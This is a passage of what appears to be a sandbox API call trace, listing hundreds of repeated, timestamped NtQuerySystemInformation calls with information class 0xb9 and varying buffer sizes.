(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0286.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0286.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0286.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0286.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf8, Length=0x58, ResultLength=0x0) [0286.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x58, ResultLength=0x0) [0286.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0286.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0286.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0286.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0286.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0286.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x28, ResultLength=0x0) [0286.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0286.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0286.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0286.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0286.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0286.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0286.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0286.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0286.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0286.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0286.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0286.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0286.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x58, ResultLength=0x0) [0286.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0286.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0286.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0286.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0286.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0286.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x28, ResultLength=0x0) [0286.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0286.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0286.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0286.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0286.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x20, ResultLength=0x0) [0286.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x20, ResultLength=0x0) [0286.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x20, ResultLength=0x0) [0286.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0286.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0286.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0286.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0286.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0286.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x58, ResultLength=0x0) [0286.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0286.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0286.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0286.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0286.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0286.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x28, ResultLength=0x0) [0286.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0286.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0286.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0286.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0286.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0286.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0286.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0286.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0286.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0286.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0286.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0286.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0286.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x58, ResultLength=0x0) [0286.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0286.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0286.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0286.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0286.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0286.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x28, ResultLength=0x0) [0286.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0286.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0286.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0286.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0286.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0286.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0286.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0286.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8c0, Length=0x20, ResultLength=0x0) [0286.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8c0, Length=0x20, ResultLength=0x0) [0286.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8c0, Length=0x20, ResultLength=0x0) [0286.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0286.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0286.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0286.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0286.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0286.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0286.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0286.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0286.989] NtQuerySystemInformation 